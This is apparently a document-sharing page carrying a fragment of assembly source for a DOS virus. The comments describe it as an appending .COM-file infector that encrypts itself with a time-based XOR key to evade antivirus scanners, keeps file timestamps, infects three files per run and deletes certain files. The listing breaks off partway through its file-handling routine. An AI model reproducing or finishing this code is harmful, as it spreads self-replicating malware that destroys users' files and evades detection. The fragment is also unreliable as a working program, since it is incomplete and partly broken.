Академический Документы
Профессиональный Документы
Культура Документы
asm==--
;
; this program is for eductional purposes only. the author takes no
; responsibilty for any use or misuse of this program. (generic disclaimer)
;
; -appending *.com infector
; -random encrpytion using dos get time funtion
; -preserves original file date and time
; -three infections per run
; -nuke those pesky ntz files off the face of the earth
; -a encryption routine big enought to get 10 signatures
; -unscanable by tbav - ha ha another twist variant?
; -f-prot scans the original virus as a trival variant
.model tiny
.radix 16
.code
org 100h
nop ; marker
nop ; marker
nop ; marker
enc_val db 0 ; this is the value that we will
counter db 0 ; encrypt with, its zero to start
nop ; then changes on subquent infections
nop ; marker
enc: mov ah,2c ; dos get time function
int 21 ; dos does it
mov [bp+enc_val],cl ; move the minute into the encryption
; value, this allows for 59 variations
decr: mov cx,byt ; byt is the number of bytes to xor
lea si,[bp+offset ntz_nuke] ; point si at the start of the actual
; virus
dec_lp: lea di,[bp+offset buff] ; point di at the buffer
movsb ; move the byte at si into the buffer
mov al,[bp+offset buff] ; move the buffer into al
xor al,[bp+enc_val] ; xor the al with the enc_val
mov [bp+offset buff],al ; move the byte back into the buffer
lea di,[si-1] ; point di back to where the byte came
from
lea si,[bp+offset buff] ; point si at the buffer
movsb ; mov si to di buffer back into the virus
mov si,di ; movsb increments after each use
loop dec_lp ; loop x number of times x=byt
ret ; done with this function bail
ntz_nuke:
mov ah,4e ; find the first match
get_ntz:
lea dx,[bp+offset ntzmask] ; load the offset filemask dx
int 21 ; dos call
jc do_again ; can't find continue infection
lea dx,[bp+offset end_it+1e]; load the offset fname (?)
mov cl, 7ah ; this loads 7a04 into ax
xchg ah, cl ; shr makes 7a04 into 3d02
mov al, 04h ; ' '
shr ax,1 ; open the file up
int 21 ; dos does it
end start
end code